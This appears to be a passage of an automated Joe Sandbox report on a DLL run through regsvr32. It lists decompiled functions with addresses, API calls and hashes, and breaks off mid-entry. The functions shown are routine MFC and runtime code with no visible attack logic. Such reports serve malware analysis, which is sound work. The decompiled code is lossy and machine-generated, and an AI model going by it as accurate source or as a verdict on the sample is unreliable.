                                                                                                                  • Part of subcall function 10049097: __getptd_noexit.LIBCMT ref: 10049097
                                                                                                                • CreateBindCtx.OLE32(00000000,?), ref: 1000B900
                                                                                                                • CoTaskMemFree.OLE32(?), ref: 1000B9A0
                                                                                                                • CoTaskMemFree.OLE32(?), ref: 1000B9AB
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FreeTask$BindCreateH_prolog3___getptd_noexit__snprintf_slstrlen
                                                                                                                • String ID:
                                                                                                                • API String ID: 2341559186-0
                                                                                                                • Opcode ID: c1dee482e81fc3de72b0be31839e8261954ebef90ab5afc6c2a4624c5598f9ac
                                                                                                                • Instruction ID: 731885473514ceb126aa7af1581c9c99ad427e6226d60a221b743c0619bdfa44
                                                                                                                • Opcode Fuzzy Hash: c1dee482e81fc3de72b0be31839e8261954ebef90ab5afc6c2a4624c5598f9ac
                                                                                                                • Instruction Fuzzy Hash: 607122B5D00619EFDF11DFE4C8849EEBBBAFF89350B24415AF501AB265DB31A901CB60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 100368ED Relevance: 10.6, APIs: 7, Instructions: 68windowkeyboardCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 67%
                                                                                                                			E100368ED(void* __ecx, signed int _a4, long _a8) {
				struct HWND__* _v8;
				signed short _t23;
				signed short _t24;
				long _t25;
				void* _t30;
				int _t33;
				struct HWND__* _t37;

				_push(__ecx);
				_t30 = __ecx;
				if(GetKeyState(0x11) < 0) {
					_push(8);
					_pop(0);
				}
				_t23 = 0;
				if(GetKeyState(0x10) < 0) {
					_push(4);
					_pop(0);
				}
				_t24 = _t23;
				_t37 = GetFocus();
				_v8 = GetDesktopWindow();
				if(_t37 != 0) {
					_t33 = _a4 << 0x00000010 | _t24 & 0x0000ffff;
					do {
						_t25 = SendMessageA(_t37, 0x20a, _t33, _a8);
						_t37 = GetParent(_t37);
					} while (_t25 == 0 && _t37 != 0 && _t37 != _v8);
				} else {
					_t25 = SendMessageA( *(_t30 + 0x20), 0x20a, _a4 << 0x00000010 | _t24 & 0x0000ffff, _a8);
				}
				return _t25;
			}










                                                                                                                0x100368f0
                                                                                                                0x100368fc
                                                                                                                0x10036903
                                                                                                                0x10036905
                                                                                                                0x10036907
                                                                                                                0x10036907
                                                                                                                0x1003690e
                                                                                                                0x10036916
                                                                                                                0x10036918
                                                                                                                0x1003691a
                                                                                                                0x1003691a
                                                                                                                0x1003691f
                                                                                                                0x10036927
                                                                                                                0x10036931
                                                                                                                0x10036934
                                                                                                                0x10036960
                                                                                                                0x10036962
                                                                                                                0x10036973
                                                                                                                0x1003697d
                                                                                                                0x1003697d
                                                                                                                0x10036936
                                                                                                                0x10036953
                                                                                                                0x10036953
                                                                                                                0x10036990

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSendState$DesktopFocusParentWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 4150626516-0
                                                                                                                • Opcode ID: 9a934e56d06f8420ced08b3f003bf898e20424dbf1ab2368cb9cd4e11e2626cd
                                                                                                                • Instruction ID: b08179133bad728bd0a424a8e609a40b3bccbb61917cf79b6a10bb47f5793f4b
                                                                                                                • Opcode Fuzzy Hash: 9a934e56d06f8420ced08b3f003bf898e20424dbf1ab2368cb9cd4e11e2626cd
                                                                                                                • Instruction Fuzzy Hash: 36112732A00325BFEB115BA48C88BA9379CEB4D7A2F118513FE41DF141D6B0CD015AA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10006B1C Relevance: 9.1, APIs: 6, Instructions: 65windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 78%
                                                                                                                			E10006B1C(void* __ecx, void* __edx) {
				signed int _v8;
				int _v88;
				char _v92;
				struct tagRECT _v108;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t16;
				int _t18;
				void* _t19;
				int _t23;
				int _t24;
				void* _t40;
				void* _t48;
				void* _t49;
				void* _t52;
				signed int _t53;

				_t48 = __edx;
				_t16 =  *0x100b9e70; // 0xbb35530
				_v8 = _t16 ^ _t53;
				_t52 = __ecx;
				_t18 = IsIconic( *(__ecx + 0x20));
				_t54 = _t18;
				if(_t18 == 0) {
					_t19 = E1001B653(_t40, _t52, _t49, _t52, __eflags);
				} else {
					_push(_t40);
					L1000CE8D(_t40,  &_v92, _t49, _t52, _t54);
					SendMessageA( *(_t52 + 0x20), 0x27, _v88, 0);
					_t23 = GetSystemMetrics(0xb);
					_t24 = GetSystemMetrics(0xc);
					GetClientRect( *(_t52 + 0x20),  &_v108);
					asm("cdq");
					asm("cdq");
					DrawIcon(_v88, _v108.right - _v108.left - _t23 + 1 - _t48 >> 1, _v108.bottom - _v108.top - _t24 + 1 - _t48 >> 1,  *(_t52 + 0x358));
					_t19 = L1000CEE1(_t23,  &_v92, _t24, _t52, _t54);
					_t49 = _t52;
					_t40 = _t49;
				}
				return E1004763E(_t19, _t40, _v8 ^ _t53, _t48, _t49, _t52);
			}





















                                                                                                                0x10006b1c
                                                                                                                0x10006b22
                                                                                                                0x10006b29
                                                                                                                0x10006b2d
                                                                                                                0x10006b32
                                                                                                                0x10006b38
                                                                                                                0x10006b3a
                                                                                                                0x10006bb1
                                                                                                                0x10006b3c
                                                                                                                0x10006b3c
                                                                                                                0x10006b42
                                                                                                                0x10006b51
                                                                                                                0x10006b5f
                                                                                                                0x10006b65
                                                                                                                0x10006b70
                                                                                                                0x10006b85
                                                                                                                0x10006b94
                                                                                                                0x10006b9d
                                                                                                                0x10006ba6
                                                                                                                0x10006bab
                                                                                                                0x10006bac
                                                                                                                0x10006bac
                                                                                                                0x10006bc2

                                                                                                                APIs
                                                                                                                • IsIconic.USER32(?), ref: 10006B32
                                                                                                                  • Part of subcall function 1000CE8D: __EH_prolog3.LIBCMT ref: 1000CE94
                                                                                                                  • Part of subcall function 1000CE8D: BeginPaint.USER32(?,?), ref: 1000CEC0
                                                                                                                • SendMessageA.USER32 ref: 10006B51
                                                                                                                • GetSystemMetrics.USER32 ref: 10006B5F
                                                                                                                • GetSystemMetrics.USER32 ref: 10006B65
                                                                                                                • GetClientRect.USER32 ref: 10006B70
                                                                                                                • DrawIcon.USER32(?,?,?,?), ref: 10006B9D
                                                                                                                  • Part of subcall function 1000CEE1: __EH_prolog3.LIBCMT ref: 1000CEE8
                                                                                                                  • Part of subcall function 1000CEE1: EndPaint.USER32(?,?), ref: 1000CF03
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog3MetricsPaintSystem$BeginClientDrawIconIconicMessageRectSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 2914073315-0
                                                                                                                • Opcode ID: 7d5ad367ec7e6a495c84de9b0edac7a3a2f02a05002302d057f86cc0702b2a17
                                                                                                                • Instruction ID: eb5c1bc0e7388b9b885b88b269adcdf260be08767f406dc6939caf251d828d49
                                                                                                                • Opcode Fuzzy Hash: 7d5ad367ec7e6a495c84de9b0edac7a3a2f02a05002302d057f86cc0702b2a17
                                                                                                                • Instruction Fuzzy Hash: 82115E316006199FEB00DFB8CE89EEEBBBAEF49740F140124E546EB1A4DE70AD05CB40
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10019571 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 70libraryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 73%
                                                                                                                			E10019571(void* __ebx, void* __ecx, void* __edx, void* __edi, int _a4) {
				signed int _v8;
				char _v284;
				char _v288;
				void* __esi;
				void* __ebp;
				signed int _t9;
				intOrPtr* _t18;
				void* _t26;
				void* _t27;
				void* _t33;
				signed int _t34;
				void* _t35;
				signed int _t36;
				void* _t37;

				_t33 = __edi;
				_t32 = __edx;
				_t28 = __ecx;
				_t26 = __ebx;
				_t9 =  *0x100b9e70; // 0xbb35530
				_v8 = _t9 ^ _t36;
				_t39 = _a4 - 0x800;
				_t35 = __ecx;
				if(_a4 != 0x800) {
					__eflags = GetLocaleInfoA(_a4, 3,  &_v288, 4);
					if(__eflags != 0) {
						goto L2;
					} else {
					}
				} else {
					_push(E1004C6C3(__edx,  &_v288, 4, "LOC"));
					L1000135C(__ebx, _t28, __edi, _t35);
					_t37 = _t37 + 0x10;
					L2:
					_push(_t26);
					_push(_t33);
					_t34 =  *(E10049097(_t39));
					 *(E10049097(_t39)) =  *_t14 & 0x00000000;
					_t35 = 0x112;
					_t27 = E1004C1D3( &_v284, 0x112, 0x111, 0x112,  &_v288);
					_t18 = E10049097(_t39);
					_t40 =  *_t18;
					if( *_t18 == 0) {
						 *(E10049097(__eflags)) = _t34;
					} else {
						E1000AD19( *((intOrPtr*)(E10049097(_t40))));
					}
					if(_t27 == 0xffffffff || _t27 >= _t35) {
						_t12 = 0;
						__eflags = 0;
					} else {
						_t12 = LoadLibraryA( &_v284);
					}
					_pop(_t33);
					_pop(_t26);
				}
				return E1004763E(_t12, _t26, _v8 ^ _t36, _t32, _t33, _t35);
			}

















                                                                                                                0x10019571
                                                                                                                0x10019571
                                                                                                                0x10019571
                                                                                                                0x10019571
                                                                                                                0x1001957a
                                                                                                                0x10019581
                                                                                                                0x10019584
                                                                                                                0x1001958c
                                                                                                                0x10019594
                                                                                                                0x10019608
                                                                                                                0x1001960a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001960c
                                                                                                                0x10019596
                                                                                                                0x100195a3
                                                                                                                0x100195a4
                                                                                                                0x100195a9
                                                                                                                0x100195ac
                                                                                                                0x100195ac
                                                                                                                0x100195ad
                                                                                                                0x100195b3
                                                                                                                0x100195ba
                                                                                                                0x100195ca
                                                                                                                0x100195df
                                                                                                                0x100195e1
                                                                                                                0x100195e6
                                                                                                                0x100195e9
                                                                                                                0x10019613
                                                                                                                0x100195eb
                                                                                                                0x100195f2
                                                                                                                0x100195f7
                                                                                                                0x10019618
                                                                                                                0x1001962d
                                                                                                                0x1001962d
                                                                                                                0x1001961e
                                                                                                                0x10019625
                                                                                                                0x10019625
                                                                                                                0x1001962f
                                                                                                                0x10019630
                                                                                                                0x10019630
                                                                                                                0x1001963d

                                                                                                                APIs
                                                                                                                • _strcpy_s.LIBCMT ref: 1001959E
                                                                                                                  • Part of subcall function 10049097: __getptd_noexit.LIBCMT ref: 10049097
                                                                                                                • __snprintf_s.LIBCMT ref: 100195D7
                                                                                                                  • Part of subcall function 1004C1D3: __vsnprintf_s_l.LIBCMT ref: 1004C1E8
                                                                                                                • GetLocaleInfoA.KERNEL32(00000800,00000003,?,00000004), ref: 10019602
                                                                                                                • LoadLibraryA.KERNEL32(?), ref: 10019625
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InfoLibraryLoadLocale__getptd_noexit__snprintf_s__vsnprintf_s_l_strcpy_s
                                                                                                                • String ID: LOC
                                                                                                                • API String ID: 3864805678-519433814
                                                                                                                • Opcode ID: 6594c7518ffc80edd72be3ad7d85f5af8eab506f016d828ffb66156ef1f4dc22
                                                                                                                • Instruction ID: 212530b40b3413e9381a31f2f5a97131ffea2fc55ce2f64732fe8a4d9ea1e514
                                                                                                                • Opcode Fuzzy Hash: 6594c7518ffc80edd72be3ad7d85f5af8eab506f016d828ffb66156ef1f4dc22
                                                                                                                • Instruction Fuzzy Hash: 6111D3B5900218AEDB11DB70CC86BDD37ACEF01355F2100B1F605EB092DA74EA858BA5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1004763E Relevance: 7.6, APIs: 5, Instructions: 57COMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 85%
                                                                                                                			E1004763E(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _t6;
				intOrPtr _t11;
				intOrPtr _t12;
				intOrPtr _t13;
				long _t17;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t31;
				void* _t34;

				_t27 = __esi;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ecx;
				_t21 = __ebx;
				_t6 = __eax;
				_t34 = _t22 -  *0x100b9e70; // 0xbb35530
				if(_t34 == 0) {
					asm("repe ret");
				}
				 *0x100be548 = _t6;
				 *0x100be544 = _t22;
				 *0x100be540 = _t25;
				 *0x100be53c = _t21;
				 *0x100be538 = _t27;
				 *0x100be534 = _t26;
				 *0x100be560 = ss;
				 *0x100be554 = cs;
				 *0x100be530 = ds;
				 *0x100be52c = es;
				 *0x100be528 = fs;
				 *0x100be524 = gs;
				asm("pushfd");
				_pop( *0x100be558);
				 *0x100be54c =  *_t31;
				 *0x100be550 = _v0;
				 *0x100be55c =  &_a4;
				 *0x100be498 = 0x10001;
				_t11 =  *0x100be550; // 0x0
				 *0x100be44c = _t11;
				 *0x100be440 = 0xc0000409;
				 *0x100be444 = 1;
				_t12 =  *0x100b9e70; // 0xbb35530
				_v812 = _t12;
				_t13 =  *0x100b9e74; // 0xf44caacf
				_v808 = _t13;
				 *0x100be490 = IsDebuggerPresent();
				_push(1);
				E10062721(_t14);
				SetUnhandledExceptionFilter(0);
				_t17 = UnhandledExceptionFilter(0x100a12d8);
				if( *0x100be490 == 0) {
					_push(1);
					E10062721(_t17);
				}
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}



















                                                                                                                0x1004763e
                                                                                                                0x1004763e
                                                                                                                0x1004763e
                                                                                                                0x1004763e
                                                                                                                0x1004763e
                                                                                                                0x1004763e
                                                                                                                0x1004763e
                                                                                                                0x10047644
                                                                                                                0x10047646
                                                                                                                0x10047646
                                                                                                                0x10051ae5
                                                                                                                0x10051aea
                                                                                                                0x10051af0
                                                                                                                0x10051af6
                                                                                                                0x10051afc
                                                                                                                0x10051b02
                                                                                                                0x10051b08
                                                                                                                0x10051b0f
                                                                                                                0x10051b16
                                                                                                                0x10051b1d
                                                                                                                0x10051b24
                                                                                                                0x10051b2b
                                                                                                                0x10051b32
                                                                                                                0x10051b33
                                                                                                                0x10051b3c
                                                                                                                0x10051b44
                                                                                                                0x10051b4c
                                                                                                                0x10051b57
                                                                                                                0x10051b61
                                                                                                                0x10051b66
                                                                                                                0x10051b6b
                                                                                                                0x10051b75
                                                                                                                0x10051b7f
                                                                                                                0x10051b84
                                                                                                                0x10051b8a
                                                                                                                0x10051b8f
                                                                                                                0x10051b9b
                                                                                                                0x10051ba0
                                                                                                                0x10051ba2
                                                                                                                0x10051baa
                                                                                                                0x10051bb5
                                                                                                                0x10051bc2
                                                                                                                0x10051bc4
                                                                                                                0x10051bc6
                                                                                                                0x10051bcb
                                                                                                                0x10051bdf

                                                                                                                APIs
                                                                                                                • IsDebuggerPresent.KERNEL32 ref: 10051B95
                                                                                                                • SetUnhandledExceptionFilter.KERNEL32 ref: 10051BAA
                                                                                                                • UnhandledExceptionFilter.KERNEL32(100A12D8), ref: 10051BB5
                                                                                                                • GetCurrentProcess.KERNEL32(C0000409), ref: 10051BD1
                                                                                                                • TerminateProcess.KERNEL32(00000000), ref: 10051BD8
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                • String ID:
                                                                                                                • API String ID: 2579439406-0
                                                                                                                • Opcode ID: 500806440b6f5c9c282f01871ea2c3057755e7dcf7f599cfed5551d0f8a355ac
                                                                                                                • Instruction ID: e741ea3e61d09aa0f8a454da4e742f38b60909009e684e33022972ac0ce8d015
                                                                                                                • Opcode Fuzzy Hash: 500806440b6f5c9c282f01871ea2c3057755e7dcf7f599cfed5551d0f8a355ac
                                                                                                                • Instruction Fuzzy Hash: F121BCBC401AA4DFF320DF68D9C56C43BB0FB09348F50565AE90A922A1E7B46D858F16
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 100145C3 Relevance: 6.0, APIs: 4, Instructions: 41keyboardwindowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 91%
                                                                                                                			E100145C3(void* __ecx) {
				void* __ebx;
				void* __edi;
				signed int _t5;
				void* _t15;
				void* _t18;
				void* _t19;

				_t15 = __ecx;
				if((E100177F8(__ecx) & 0x40000000) != 0) {
					L6:
					_t5 = E10013F46(_t15, _t15, _t18, __eflags);
					asm("sbb eax, eax");
					return  ~( ~_t5);
				}
				_t19 = E10012730();
				if(_t19 == 0) {
					goto L6;
				}
				_t18 = GetKeyState;
				if(GetKeyState(0x10) < 0 || GetKeyState(0x11) < 0 || GetKeyState(0x12) < 0) {
					goto L6;
				} else {
					SendMessageA( *(_t19 + 0x20), 0x111, 0xe146, 0);
					return 1;
				}
			}









                                                                                                                0x100145c6
                                                                                                                0x100145d2
                                                                                                                0x1001461a
                                                                                                                0x1001461c
                                                                                                                0x10014623
                                                                                                                0x00000000
                                                                                                                0x10014625
                                                                                                                0x100145d9
                                                                                                                0x100145dd
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100145df
                                                                                                                0x100145ec
                                                                                                                0x00000000
                                                                                                                0x10014600
                                                                                                                0x1001460f
                                                                                                                0x00000000
                                                                                                                0x10014617

                                                                                                                APIs
                                                                                                                  • Part of subcall function 100177F8: GetWindowLongA.USER32(?,000000F0), ref: 10017803
                                                                                                                • GetKeyState.USER32(00000010), ref: 100145E7
                                                                                                                • GetKeyState.USER32(00000011), ref: 100145F0
                                                                                                                • GetKeyState.USER32(00000012), ref: 100145F9
                                                                                                                • SendMessageA.USER32 ref: 1001460F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: State$LongMessageSendWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 1063413437-0
                                                                                                                • Opcode ID: 95f1b131c0c2e130cfe50c6eb6efd6780e38a756da53206ae19ccfbb14021f1c
                                                                                                                • Instruction ID: 6e61cc1eb6a95425632292877bab435b541be555978035ebcc8d7c4d1af18e25
                                                                                                                • Opcode Fuzzy Hash: 95f1b131c0c2e130cfe50c6eb6efd6780e38a756da53206ae19ccfbb14021f1c
                                                                                                                • Instruction Fuzzy Hash: 49F0E93A78029A25E610BE744C41FDE11A4DFC2FD5F030534E642EE0E2CDB0C8821575
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1003B247 Relevance: 4.6, APIs: 3, Instructions: 64comCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 37%
                                                                                                                			E1003B247(intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _t21;
				intOrPtr _t24;
				void* _t25;
				intOrPtr _t26;
				signed int _t27;
				void* _t31;
				intOrPtr* _t32;
				void* _t37;
				void* _t40;
				intOrPtr* _t41;

				_t34 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t41 = __imp__CoCreateInstance;
				_t32 = __ecx;
				 *((intOrPtr*)(__ecx + 4)) = 1;
				_t21 =  *_t41(_a4, 0, 0x17, 0x100a594c,  &_v8, _t37, _t40, _t31, __ecx, __ecx);
				_v12 = _t21;
				if(_t21 == 0x80070057) {
					_t21 =  *_t41(_a4, 0, 7, 0x100a594c,  &_v8);
					_v12 = _t21;
				}
				if(_v12 < 0) {
					L5:
					L10020F7B( &_v8);
					_t24 = _a8;
					if(_t24 != 0) {
						 *((intOrPtr*)(_t24 + 8)) = _v12;
					}
					_t25 = 0;
				} else {
					__imp__OleRun(_v8);
					_v12 = _t21;
					if(_t21 < 0) {
						goto L5;
					} else {
						_t26 = L10020F57(_t34, _v8, 0x100a4a1c);
						 *_t32 = _t26;
						if(_t26 != 0) {
							_t27 = _v8;
							 *((intOrPtr*)( *_t27 + 8))(_t27);
							_t25 = 1;
						} else {
							goto L5;
						}
					}
				}
				return _t25;
			}















                                                                                                                0x1003b247
                                                                                                                0x1003b24c
                                                                                                                0x1003b252
                                                                                                                0x1003b26a
                                                                                                                0x1003b26c
                                                                                                                0x1003b273
                                                                                                                0x1003b27a
                                                                                                                0x1003b27d
                                                                                                                0x1003b28b
                                                                                                                0x1003b28d
                                                                                                                0x1003b28d
                                                                                                                0x1003b294
                                                                                                                0x1003b2b9
                                                                                                                0x1003b2bd
                                                                                                                0x1003b2c2
                                                                                                                0x1003b2c7
                                                                                                                0x1003b2cc
                                                                                                                0x1003b2cc
                                                                                                                0x1003b2cf
                                                                                                                0x1003b296
                                                                                                                0x1003b299
                                                                                                                0x1003b2a1
                                                                                                                0x1003b2a4
                                                                                                                0x00000000
                                                                                                                0x1003b2a6
                                                                                                                0x1003b2ae
                                                                                                                0x1003b2b5
                                                                                                                0x1003b2b7
                                                                                                                0x1003b2d3
                                                                                                                0x1003b2d9
                                                                                                                0x1003b2de
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003b2b7
                                                                                                                0x1003b2a4
                                                                                                                0x1003b2e3

                                                                                                                APIs
